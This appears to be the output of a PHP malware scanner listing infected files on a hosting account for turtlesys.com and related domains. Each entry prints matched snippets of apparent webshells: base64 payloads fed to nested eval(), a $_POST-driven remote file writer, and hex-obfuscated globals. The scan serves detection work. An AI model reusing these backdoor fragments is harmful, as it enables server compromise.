Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php 'QbhXIRHo/dbKpv/Ny3X8vP/GuWFFk5WMN0y2B3q54C81VpXtXi3JnTAqrbl1PaiT91wXfpWHbJyxRsf6AWT+xAl9a7pjyZpeMPTwfcWfdYwyW9ws8nXJQjx9kNf2YdYMK+7R8u+NGDUtL0t0qrt2fggS5PHf6pVEFyLo4IXcPCmVj7W1tOu7SFfLnCKHFG6fNLvFXOyy0t9FZjJ5TDMtDBrKaCNdTOU2XOpF0JmZp4BTVweIKPcR8iDIqGk1k8H2EogAyFUSqlTcLMAEYpZmgBkW6lMlpTfP0IxFKI85COyTvsHQ5RRU9k3+DDIDvMik5z3Oe5NmVX2CCCJSpH7d9/6NzmHaRAsM6WeSlCKTnBTrCHAi8xHMfmQixSHkPiv9FDDDWF1EtWZrcnUkKGF2bzJrcnUgYWJ2Z3BhaHN7KSldMFtdo8RbRllOT0JZVCQoZmdmdmtyX2FidmdwYWhzIShzdgo7KSkpOC0gLG4wazAsJwAApyL...
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($SIunp($udwGf($IgvuO($xqlbS('QbhXIRHo/dbKpv/Ny3X8vP/GuWFFk5WMN0y2B3q54C81VpXtXi3JnTAqrbl1PaiT91wXfpWHbJyxRsf6AWT+xAl9a7pjyZpeMPTwfcWfdYwyW9ws8nXJQjx9kNf2YdYMK+7R8u+NGDUtL0t0qrt2fggS5PHf6pVEFyLo4IXcPCmVj7W1tOu7SFfLnCKHFG6fNLvFXOyy0t9FZjJ5TDMtDBrKaCNdTOU2XOpF0JmZp4BTVweIKPcR8iDIqGk1k8H2EogAyFUSqlTcLMAEYpZmgBkW6lMlpTfP0IxFKI85COyTvsHQ5RRU9k3+DDIDvMik5z3Oe5NmVX2CCCJSpH7d9/6NzmHaRAsM6WeSlCKTnBTrCHAi8xHMfmQixSHkPiv9FDDDWF1EtWZrcnUkKGF2bzJrcnUgYWJ2Z3BhaHN7KSldMFtdo8RbRllOT0JZVCQoZmdmdmtyX2FidmdwYW...
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/public_html/turtlesys.com/xty8kfZaHV2.php Size: 166.77 kB Created: 2024-06-04 19:34:41 Modified: 2024-06-04 19:34:41 Dangers: 2
| Description | Match |
|---|
Sign 963e968a Line: 4341 Dangerous Malware Signature (hash: 963e968a) | <?php php_uname()
| Sign a408f408 Line: 1732 Dangerous Malware Signature (hash: a408f408) | <?php cmd.exe
|
|
/custdata02/turtle/public_html/turtlesys.com/5rQHZLpwovi.php Size: 51.81 kB Created: 2024-06-04 19:34:41 Modified: 2024-06-04 19:34:41 Warns: 2 Dangers: 3
| Description | Match |
|---|
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php 'VTIlpz9lK3WypT9lqTyhMluSK0SZGS5SK05CIRyQEFx7MTIznJ5yXPsYcitaYPNawFpcBlEUGR9PDHkGJ8hz+S0tCFOyrUOfo2EyXPq8OUjRsNVaYPOarzyhMzkuqTHbp3Ivp3ElXPpsvjtNNNNNNNNXYW3KwggDqRJOVS8GCeP3EknWiKr+OBl9vW1RCw6pBO7LLkzDXA57mw5eFoFzYv4xopo/+p/36m/+/Fa+17/iXVkP72/8/29O/74wBLdvBNe/h/KssuG3//6nWzgOLC+qS9zHS//+6LOlpm+8k+YW/gd/8TV6Dt3cJpUdf/qtsxgY3r9UGcJJTsUq+heib83B6zwwOmLj5MVDt1p06wAJpFNKdl9I0ixoyQDtFQ42U82VnEq3bizYstzzFjugoFAL+/PkXC9tKSldib82BM6yDL2WZwrPy5iuafYTbID1UdSdLOzPdo/ibPOMSS2EE3H6xqv+wQc5Rg5VpBJefHMVmPCYH6B...
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($MuUwa($tIRhZ('VTIlpz9lK3WypT9lqTyhMluSK0SZGS5SK05CIRyQEFx7MTIznJ5yXPsYcitaYPNawFpcBlEUGR9PDHkGJ8hz+S0tCFOyrUOfo2EyXPq8OUjRsNVaYPOarzyhMzkuqTHbp3Ivp3ElXPpsvjtNNNNNNNNXYW3KwggDqRJOVS8GCeP3EknWiKr+OBl9vW1RCw6pBO7LLkzDXA57mw5eFoFzYv4xopo/+p/36m/+/Fa+17/iXVkP72/8/29O/74wBLdvBNe/h/KssuG3//6nWzgOLC+qS9zHS//+6LOlpm+8k+YW/gd/8TV6Dt3cJpUdf/qtsxgY3r9UGcJJTsUq+heib83B6zwwOmLj5MVDt1p06wAJpFNKdl9I0ixoyQDtFQ42U82VnEq3bizYstzzFjugoFAL+/PkXC9tKSldib82BM6yDL2WZwrPy5iuafYTbID1UdSdLOzPdo/ibPOMSS2EE3H6xqv+wQc5...
| Function strrev eval_strrev Line: 1 Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php LAve
| Sign 7830f7a6 Line: 1 Dangerous Malware Signature (hash: 7830f7a6) | <?php N0YX
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/public_html/turtlesys.com/OafmhWKdt2z.php Size: 38.68 kB Created: 2024-06-04 19:34:41 Modified: 2024-06-04 19:34:41 Warns: 1
| Description | Match |
|---|
Function eval Line: 164 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(_TOpUgAAnRVE2EiM5($GLOBALS[˦ø][0x00008])))))))))))))))))))
|
|
/custdata02/turtle/public_html/turtlesys.com/theme-insifmq.php Size: 338.00 B Created: 2024-06-04 19:34:41 Modified: 2024-06-04 19:34:41 Dangers: 2
| Description | Match |
|---|
Exploit download_remote_code2 Line: 1 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine | <?php fwrite(fopen(trim($_POST['name']), 'w'), $b4(trim($_POST['message'])
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/public_html/turtlesys.com/W6UCFcpG1Yx.php Size: 43.51 kB Created: 2024-06-04 19:51:12 Modified: 2024-06-04 19:51:12 Warns: 2 Dangers: 1
| Description | Match |
|---|
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php 'eJy0/FOUbk0QJgyWbdu2bduut2zbtm3rlG3btk7Ztnnm6/5X96yZ7qtZa/Jirx2ZkZFPPDt2ZsRN8lL/35oeF9N/zYZJV69kRFdCW0FRRFuNjEpKxM5BW1peSotT1chJWVhcW92Aysveyvn/zw8/3v8BScfJQUvZgIxKx9zFxoDKQVKVm8lF4j/Z2cLey8XI3c6VysrZzMzCnMjIzNLC2Yz3f2t42TsYe7nyemrL2tpwmyv+rw6f/23x/+IWkZGxu4WjkaULrx7n/0kE//+2zavH8X+O/r9X8uM1cpaQdZA1IPtfqP4Ht+z/B7FG7g4sNs5uVNQWRu5UdP+psDH93/j//1T7X6ap/nPawdKc/3/J/3MN1v/f5/tQ/++R/8n1/+bC7z933B3M/5cvfrws/3MNflr3/xx1JONn+J+jPs7mXs7/U/5/RGomfn53MioXd15qezI6PZb/Cy5PR3sTfsf/gP8/g3TuZHT/YfoP6f/GZv8/UJH...
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($fpwQi($fCjKH($LElTj($HJrhk('eJy0/FOUbk0QJgyWbdu2bduut2zbtm3rlG3btk7Ztnnm6/5X96yZ7qtZa/Jirx2ZkZFPPDt2ZsRN8lL/35oeF9N/zYZJV69kRFdCW0FRRFuNjEpKxM5BW1peSotT1chJWVhcW92Aysveyvn/zw8/3v8BScfJQUvZgIxKx9zFxoDKQVKVm8lF4j/Z2cLey8XI3c6VysrZzMzCnMjIzNLC2Yz3f2t42TsYe7nyemrL2tpwmyv+rw6f/23x/+IWkZGxu4WjkaULrx7n/0kE//+2zavH8X+O/r9X8uM1cpaQdZA1IPtfqP4Ht+z/B7FG7g4sNs5uVNQWRu5UdP+psDH93/j//1T7X6ap/nPawdKc/3/J/3MN1v/f5/tQ/++R/8n1/+bC7z933B3M/5cvfrws/3MNflr3/xx1JONn+J+jPs7mXs7/U/5/RGomfn53MioXd15qezI6PZb/Cy5PR3...
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/public_html/turtlesys.com/HbIQCKgOwNt.php Size: 166.77 kB Created: 2024-06-04 19:51:12 Modified: 2024-06-04 19:51:12 Dangers: 2
| Description | Match |
|---|
Sign 963e968a Line: 4341 Dangerous Malware Signature (hash: 963e968a) | <?php php_uname()
| Sign a408f408 Line: 1732 Dangerous Malware Signature (hash: a408f408) | <?php cmd.exe
|
|
/custdata02/turtle/public_html/turtlesys.com/8fXp7N6R4bt.php Size: 51.33 kB Created: 2024-06-04 19:51:12 Modified: 2024-06-04 19:51:12 Warns: 2 Dangers: 2
| Description | Match |
|---|
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php 'eJy091O0bk0QJQpunm3rbNu2bdvftm3btm3btm3btnn6r7q3atzurqceo/NhjRWZEZEz5lqRGcFN+f89dDgY/hvuDNo676VT2soygkLyMuIkFKyyFqJMompKtoKCZqr28ip6FNYGrib/f3n4cP8PHPIiIk4KZnZ6JBTWWppqehRWHKbG4lLSKur/zZg4G1ib2lp4mlG4mjg6OjsR2Dq6OJs4cv8/dKwNDO2szbilHDXl2P6X5PX/cPr/FQ+BrZ2Fs5Gtiym3Dvv/gQDe/4dvbh22/4PC/72VDzenqKahjR7J/wL1Pzhl/f8m1NbCkMndxJyC0tnWgoLmPx0Whv8j8f/vev+3b4r/gjZ0ceL9v8X/uQfz/8/mXpT/a/5/Uv2/mfDx4f7P3Ol/ReLDzfQ/d+CltvgvSiMSXrr/uepl4mRt8j/l/0ukZODltSChMLXgpjQgodFh+j+hsjIysOc1+g/3/7VKY0FC8x+k/3D+b2gG/zmyJeH...
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($UbskV($gbWJv($UMwGZ('eJy091O0bk0QJQpunm3rbNu2bdvftm3btm3btm3btnn6r7q3atzurqceo/NhjRWZEZEz5lqRGcFN+f89dDgY/hvuDNo676VT2soygkLyMuIkFKyyFqJMompKtoKCZqr28ip6FNYGrib/f3n4cP8PHPIiIk4KZnZ6JBTWWppqehRWHKbG4lLSKur/zZg4G1ib2lp4mlG4mjg6OjsR2Dq6OJs4cv8/dKwNDO2szbilHDXl2P6X5PX/cPr/FQ+BrZ2Fs5Gtiym3Dvv/gQDe/4dvbh22/4PC/72VDzenqKahjR7J/wL1Pzhl/f8m1NbCkMndxJyC0tnWgoLmPx0Whv8j8f/vev+3b4r/gjZ0ceL9v8X/uQfz/8/mXpT/a/5/Uv2/mfDx4f7P3Ol/ReLDzfQ/d+CltvgvSiMSXrr/uepl4mRt8j/l/0ukZODltSChMLXgpjQgodFh+j+hsjIysOc1+g/3/...
| Sign 7830f7a6 Line: 1 Dangerous Malware Signature (hash: 7830f7a6) | <?php n0CL
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/public_html/turtlesys.com/jmcDXT7QPoW.php Size: 38.68 kB Created: 2024-06-04 19:51:12 Modified: 2024-06-04 19:51:12 Warns: 1
| Description | Match |
|---|
Function eval Line: 164 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(_TOpUgAAnRVE2EiM5($GLOBALS[˦ø][0x00008])))))))))))))))))))
|
|
/custdata02/turtle/public_html/turtlesys.com/theme-inseftj.php Size: 338.00 B Created: 2024-06-04 19:51:12 Modified: 2024-06-04 19:51:12 Dangers: 2
| Description | Match |
|---|
Exploit download_remote_code2 Line: 1 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine | <?php fwrite(fopen(trim($_POST['name']), 'w'), $b4(trim($_POST['message'])
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/public_html/turtlesys.net/index.php Size: 13.95 kB Created: 2024-06-01 05:39:22 Modified: 2024-06-01 08:12:22 Dangers: 6
| Description | Match |
|---|
Exploit global_var_string Dangerous Code Injection, through escaped global vars, allow inject attackers to execute PHP code on the target machine via HTTP request | <?php ${"_GET"}
| Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
| Exploit hex_var Line: 2 Dangerous Hex var technique is usually used for the obfuscation of malicious code, it is also used by IonCube | <?php ${"\x47\x4c\x4f\x42\x41\x4c\x53"}
| Sign 237750ea Line: 2 Dangerous Malware Signature (hash: 237750ea) | <?php \x47\x4c\x4f\x42\x41\x4c\x53
| Sign 301ca578 Dangerous Malware Signature (hash: 301ca578) | <?php trojan
| Sign 407651f7 Line: 2 Dangerous Malware Signature (hash: 407651f7) | <?php w/cGhw
|
|
/custdata02/turtle/public_html/webadmin.turtlesys.net/cgi-bin/wp/iPNLvdg.php Size: 1.29 kB Created: 2024-06-01 06:19:57 Modified: 2024-06-01 08:12:22 Warns: 1 Dangers: 2
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval('?>' . $a); exit(); function get_url_content($url) { if (function_exists('curl_exec')) { $conn = curl_init($url); curl_setopt($conn, CURLOPT_RETURNTRANSFER, 1); curl_setopt($conn, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($conn, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($conn, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($conn, CURLOPT_SSL_VERIFYHOST, 0); if (isset($_SESSION['coki'])) { curl_setopt($conn, CURLOPT_COOKIE, $_SESSION['coki'])...
| Sign 11413268 Line: 9 Dangerous Malware Signature (hash: 11413268) | <?php eval('?>
| Sign a915f4c2 Line: 8 Dangerous Malware Signature (hash: a915f4c2) | <?php uggc://
|
|
/custdata02/turtle/public_html/webadmin.turtlesys.net/ShoMEFP1ypJ.php Size: 43.44 kB Created: 2024-06-01 02:25:29 Modified: 2024-06-01 08:12:22 Warns: 2 Dangers: 3
| Description | Match |
|---|
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php 'R6P3Wyqb/zcto/Lz/wYWtUpOVjDdZtgdtueFIjC80bd41qx0wKq25aD2ok/TCk3mdh3pduQtn+gJ+5uQKfnkxcPny2zdw8GvFn2kMMlvdKP5oyC40fZDX9m72DTn2UZJejRg1LS9YZ6q7aX4IEuTx3+qVYRci6OCF3D1PNY+1tbTru1VKqx05U0UYlkisoq52WWlvqT8xV0qxloYNZT6RrqzymqJMqWnMzNPAIyUDxBR4SPoQZFQ7HvkXezlEAGQkCV0j7hZgElZLBcA4i30jCjaXx+hGaRSHnIRkk77B0CUUR/VG/gziA72NJOc9znuTc0h9gggiRaR+3ff+jCwzpdJdZu2lEpQdYQxkQyc4KDzEcx+cSLFIeQ+K/0UMMNLXVG1ZmtydSQoYXZvMmtydSBhYnZncGFoc3spKV0wW12jxFtGWU5PQllUJChmZ2Z2a3JfYWJ2Z3BhaHMhKHN2CjspKSk4LSAsbjBrMCwnAACnIv/IEUI...
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($DiNjf($zrfJC($PcQnr($kNdXC('R6P3Wyqb/zcto/Lz/wYWtUpOVjDdZtgdtueFIjC80bd41qx0wKq25aD2ok/TCk3mdh3pduQtn+gJ+5uQKfnkxcPny2zdw8GvFn2kMMlvdKP5oyC40fZDX9m72DTn2UZJejRg1LS9YZ6q7aX4IEuTx3+qVYRci6OCF3D1PNY+1tbTru1VKqx05U0UYlkisoq52WWlvqT8xV0qxloYNZT6RrqzymqJMqWnMzNPAIyUDxBR4SPoQZFQ7HvkXezlEAGQkCV0j7hZgElZLBcA4i30jCjaXx+hGaRSHnIRkk77B0CUUR/VG/gziA72NJOc9znuTc0h9gggiRaR+3ff+jCwzpdJdZu2lEpQdYQxkQyc4KDzEcx+cSLFIeQ+K/0UMMNLXVG1ZmtydSQoYXZvMmtydSBhYnZncGFoc3spKV0wW12jxFtGWU5PQllUJChmZ2Z2a3JfYWJ2Z3BhaHMhKH...
| Sign 7830f7a6 Line: 1 Dangerous Malware Signature (hash: 7830f7a6) | <?php NVCh
| Sign ae7830db Line: 1 Dangerous Malware Signature (hash: ae7830db) | <?php y2HY
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/public_html/webadmin.turtlesys.net/bUKoaD1HgTE.php Size: 51.36 kB Created: 2024-06-01 02:25:29 Modified: 2024-06-01 08:12:22 Warns: 2 Dangers: 2
| Description | Match |
|---|
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php 'eJy091O0bk0QJQpunm3rbNu2bdvftm3btm3btm3btnn6r7q3atzurqceo/NhjRWZEZEz5lqRGcFN+f89dDgY/hvuDNo676VT2soygkLyMuIkFKyyFqJMompKtoKCZqr28ip6FNYGrib/f3n4cP8PHPIiIk4KZnZ6JBTWWppqehRWHKbG4lLSKur/zZg4G1ib2lp4mlG4mjg6OjsR2Dq6OJs4cv8/dKwNDO2szbilHDXl2P6X5PX/cPr/FQ+BrZ2Fs5Gtiym3Dvv/gQDe/4dvbh22/4PC/72VDzenqKahjR7J/wL1Pzhl/f8m1NbCkMndxJyC0tnWgoLmPx0Whv8j8f/vev+3b4r/gjZ0ceL9v8X/uQfz/8/mXpT/a/5/Uv2/mfDx4f7P3Ol/ReLDzfQ/d+CltvgvSiMSXrr/uepl4mRt8j/l/0ukZODltSChMLXgpjQgodFh+j+hsjIysOc1+g/3/7VKY0FC8x+k/3D+b2gG/zmyJeH...
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($WBZyL($AlFWd($WQIKf('eJy091O0bk0QJQpunm3rbNu2bdvftm3btm3btm3btnn6r7q3atzurqceo/NhjRWZEZEz5lqRGcFN+f89dDgY/hvuDNo676VT2soygkLyMuIkFKyyFqJMompKtoKCZqr28ip6FNYGrib/f3n4cP8PHPIiIk4KZnZ6JBTWWppqehRWHKbG4lLSKur/zZg4G1ib2lp4mlG4mjg6OjsR2Dq6OJs4cv8/dKwNDO2szbilHDXl2P6X5PX/cPr/FQ+BrZ2Fs5Gtiym3Dvv/gQDe/4dvbh22/4PC/72VDzenqKahjR7J/wL1Pzhl/f8m1NbCkMndxJyC0tnWgoLmPx0Whv8j8f/vev+3b4r/gjZ0ceL9v8X/uQfz/8/mXpT/a/5/Uv2/mfDx4f7P3Ol/ReLDzfQ/d+CltvgvSiMSXrr/uepl4mRt8j/l/0ukZODltSChMLXgpjQgodFh+j+hsjIysOc1+g/3/...
| Sign 7830f7a6 Line: 1 Dangerous Malware Signature (hash: 7830f7a6) | <?php n0CL
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/public_html/webadmin.turtlesys.net/WjfKqzZm6v3.php Size: 43.48 kB Created: 2024-06-04 19:34:42 Modified: 2024-06-04 19:34:42 Warns: 2 Dangers: 1
| Description | Match |
|---|
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php 'QbhXIRHo/dbKpv/Ny3X8vP/GuWFFk5WMN0y2B3q54C81VpXtXi3JnTAqrbl1PaiT91wXfpWHbJyxRsf6AWT+xAl9a7pjyZpeMPTwfcWfdYwyW9ws8nXJQjx9kNf2YdYMK+7R8u+NGDUtL0t0qrt2fggS5PHf6pVEFyLo4IXcPCmVj7W1tOu7SFfLnCKHFG6fNLvFXOyy0t9FZjJ5TDMtDBrKaCNdTOU2XOpF0JmZp4BTVweIKPcR8iDIqGk1k8H2EogAyFUSqlTcLMAEYpZmgBkW6lMlpTfP0IxFKI85COyTvsHQ5RRU9k3+DDIDvMik5z3Oe5NmVX2CCCJSpH7d9/6NzmHaRAsM6WeSlCKTnBTrCHAi8xHMfmQixSHkPiv9FDDDWF1EtWZrcnUkKGF2bzJrcnUgYWJ2Z3BhaHN7KSldMFtdo8RbRllOT0JZVCQoZmdmdmtyX2FidmdwYWhzIShzdgo7KSkpOC0gLG4wazAsJwAApyL...
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($SIunp($udwGf($IgvuO($xqlbS('QbhXIRHo/dbKpv/Ny3X8vP/GuWFFk5WMN0y2B3q54C81VpXtXi3JnTAqrbl1PaiT91wXfpWHbJyxRsf6AWT+xAl9a7pjyZpeMPTwfcWfdYwyW9ws8nXJQjx9kNf2YdYMK+7R8u+NGDUtL0t0qrt2fggS5PHf6pVEFyLo4IXcPCmVj7W1tOu7SFfLnCKHFG6fNLvFXOyy0t9FZjJ5TDMtDBrKaCNdTOU2XOpF0JmZp4BTVweIKPcR8iDIqGk1k8H2EogAyFUSqlTcLMAEYpZmgBkW6lMlpTfP0IxFKI85COyTvsHQ5RRU9k3+DDIDvMik5z3Oe5NmVX2CCCJSpH7d9/6NzmHaRAsM6WeSlCKTnBTrCHAi8xHMfmQixSHkPiv9FDDDWF1EtWZrcnUkKGF2bzJrcnUgYWJ2Z3BhaHN7KSldMFtdo8RbRllOT0JZVCQoZmdmdmtyX2FidmdwYW...
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/public_html/webadmin.turtlesys.net/v6mt4LHPGyI.php Size: 166.77 kB Created: 2024-06-04 19:34:42 Modified: 2024-06-04 19:34:42 Dangers: 2
| Description | Match |
|---|
Sign 963e968a Line: 4341 Dangerous Malware Signature (hash: 963e968a) | <?php php_uname()
| Sign a408f408 Line: 1732 Dangerous Malware Signature (hash: a408f408) | <?php cmd.exe
|
|
/custdata02/turtle/public_html/webadmin.turtlesys.net/IZn76zcpwgQ.php Size: 51.81 kB Created: 2024-06-04 19:34:42 Modified: 2024-06-04 19:34:42 Warns: 2 Dangers: 3
| Description | Match |
|---|
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php 'VTIlpz9lK3WypT9lqTyhMluSK0SZGS5SK05CIRyQEFx7MTIznJ5yXPsYcitaYPNawFpcBlEUGR9PDHkGJ8hz+S0tCFOyrUOfo2EyXPq8OUjRsNVaYPOarzyhMzkuqTHbp3Ivp3ElXPpsvjtNNNNNNNNXYW3KwggDqRJOVS8GCeP3EknWiKr+OBl9vW1RCw6pBO7LLkzDXA57mw5eFoFzYv4xopo/+p/36m/+/Fa+17/iXVkP72/8/29O/74wBLdvBNe/h/KssuG3//6nWzgOLC+qS9zHS//+6LOlpm+8k+YW/gd/8TV6Dt3cJpUdf/qtsxgY3r9UGcJJTsUq+heib83B6zwwOmLj5MVDt1p06wAJpFNKdl9I0ixoyQDtFQ42U82VnEq3bizYstzzFjugoFAL+/PkXC9tKSldib82BM6yDL2WZwrPy5iuafYTbID1UdSdLOzPdo/ibPOMSS2EE3H6xqv+wQc5Rg5VpBJefHMVmPCYH6B...
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($MuUwa($tIRhZ('VTIlpz9lK3WypT9lqTyhMluSK0SZGS5SK05CIRyQEFx7MTIznJ5yXPsYcitaYPNawFpcBlEUGR9PDHkGJ8hz+S0tCFOyrUOfo2EyXPq8OUjRsNVaYPOarzyhMzkuqTHbp3Ivp3ElXPpsvjtNNNNNNNNXYW3KwggDqRJOVS8GCeP3EknWiKr+OBl9vW1RCw6pBO7LLkzDXA57mw5eFoFzYv4xopo/+p/36m/+/Fa+17/iXVkP72/8/29O/74wBLdvBNe/h/KssuG3//6nWzgOLC+qS9zHS//+6LOlpm+8k+YW/gd/8TV6Dt3cJpUdf/qtsxgY3r9UGcJJTsUq+heib83B6zwwOmLj5MVDt1p06wAJpFNKdl9I0ixoyQDtFQ42U82VnEq3bizYstzzFjugoFAL+/PkXC9tKSldib82BM6yDL2WZwrPy5iuafYTbID1UdSdLOzPdo/ibPOMSS2EE3H6xqv+wQc5...
| Function strrev eval_strrev Line: 1 Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php LAve
| Sign 7830f7a6 Line: 1 Dangerous Malware Signature (hash: 7830f7a6) | <?php N0YX
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/public_html/webadmin.turtlesys.net/V6isvoE7BuR.php Size: 38.68 kB Created: 2024-06-04 19:34:42 Modified: 2024-06-04 19:34:42 Warns: 1
| Description | Match |
|---|
Function eval Line: 164 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(_TOpUgAAnRVE2EiM5($GLOBALS[˦ø][0x00008])))))))))))))))))))
|
|
/custdata02/turtle/public_html/webadmin.turtlesys.net/theme-inslbnx.php Size: 338.00 B Created: 2024-06-04 19:34:42 Modified: 2024-06-04 19:34:42 Dangers: 2
| Description | Match |
|---|
Exploit download_remote_code2 Line: 1 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine | <?php fwrite(fopen(trim($_POST['name']), 'w'), $b4(trim($_POST['message'])
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/public_html/webadmin.turtlesys.net/y2RPAHiNozY.php Size: 43.51 kB Created: 2024-06-04 19:51:13 Modified: 2024-06-04 19:51:13 Warns: 2 Dangers: 1
| Description | Match |
|---|
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php 'eJy0/FOUbk0QJgyWbdu2bduut2zbtm3rlG3btk7Ztnnm6/5X96yZ7qtZa/Jirx2ZkZFPPDt2ZsRN8lL/35oeF9N/zYZJV69kRFdCW0FRRFuNjEpKxM5BW1peSotT1chJWVhcW92Aysveyvn/zw8/3v8BScfJQUvZgIxKx9zFxoDKQVKVm8lF4j/Z2cLey8XI3c6VysrZzMzCnMjIzNLC2Yz3f2t42TsYe7nyemrL2tpwmyv+rw6f/23x/+IWkZGxu4WjkaULrx7n/0kE//+2zavH8X+O/r9X8uM1cpaQdZA1IPtfqP4Ht+z/B7FG7g4sNs5uVNQWRu5UdP+psDH93/j//1T7X6ap/nPawdKc/3/J/3MN1v/f5/tQ/++R/8n1/+bC7z933B3M/5cvfrws/3MNflr3/xx1JONn+J+jPs7mXs7/U/5/RGomfn53MioXd15qezI6PZb/Cy5PR3sTfsf/gP8/g3TuZHT/YfoP6f/GZv8/UJH...
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($fpwQi($fCjKH($LElTj($HJrhk('eJy0/FOUbk0QJgyWbdu2bduut2zbtm3rlG3btk7Ztnnm6/5X96yZ7qtZa/Jirx2ZkZFPPDt2ZsRN8lL/35oeF9N/zYZJV69kRFdCW0FRRFuNjEpKxM5BW1peSotT1chJWVhcW92Aysveyvn/zw8/3v8BScfJQUvZgIxKx9zFxoDKQVKVm8lF4j/Z2cLey8XI3c6VysrZzMzCnMjIzNLC2Yz3f2t42TsYe7nyemrL2tpwmyv+rw6f/23x/+IWkZGxu4WjkaULrx7n/0kE//+2zavH8X+O/r9X8uM1cpaQdZA1IPtfqP4Ht+z/B7FG7g4sNs5uVNQWRu5UdP+psDH93/j//1T7X6ap/nPawdKc/3/J/3MN1v/f5/tQ/++R/8n1/+bC7z933B3M/5cvfrws/3MNflr3/xx1JONn+J+jPs7mXs7/U/5/RGomfn53MioXd15qezI6PZb/Cy5PR3...
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/public_html/webadmin.turtlesys.net/okp4v2DEf36.php Size: 166.77 kB Created: 2024-06-04 19:51:13 Modified: 2024-06-04 19:51:13 Dangers: 2
| Description | Match |
|---|
Sign 963e968a Line: 4341 Dangerous Malware Signature (hash: 963e968a) | <?php php_uname()
| Sign a408f408 Line: 1732 Dangerous Malware Signature (hash: a408f408) | <?php cmd.exe
|
|
/custdata02/turtle/public_html/webadmin.turtlesys.net/u4kvzQbgYI3.php Size: 51.33 kB Created: 2024-06-04 19:51:13 Modified: 2024-06-04 19:51:13 Warns: 2 Dangers: 2
| Description | Match |
|---|
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php 'eJy091O0bk0QJQpunm3rbNu2bdvftm3btm3btm3btnn6r7q3atzurqceo/NhjRWZEZEz5lqRGcFN+f89dDgY/hvuDNo676VT2soygkLyMuIkFKyyFqJMompKtoKCZqr28ip6FNYGrib/f3n4cP8PHPIiIk4KZnZ6JBTWWppqehRWHKbG4lLSKur/zZg4G1ib2lp4mlG4mjg6OjsR2Dq6OJs4cv8/dKwNDO2szbilHDXl2P6X5PX/cPr/FQ+BrZ2Fs5Gtiym3Dvv/gQDe/4dvbh22/4PC/72VDzenqKahjR7J/wL1Pzhl/f8m1NbCkMndxJyC0tnWgoLmPx0Whv8j8f/vev+3b4r/gjZ0ceL9v8X/uQfz/8/mXpT/a/5/Uv2/mfDx4f7P3Ol/ReLDzfQ/d+CltvgvSiMSXrr/uepl4mRt8j/l/0ukZODltSChMLXgpjQgodFh+j+hsjIysOc1+g/3/7VKY0FC8x+k/3D+b2gG/zmyJeH...
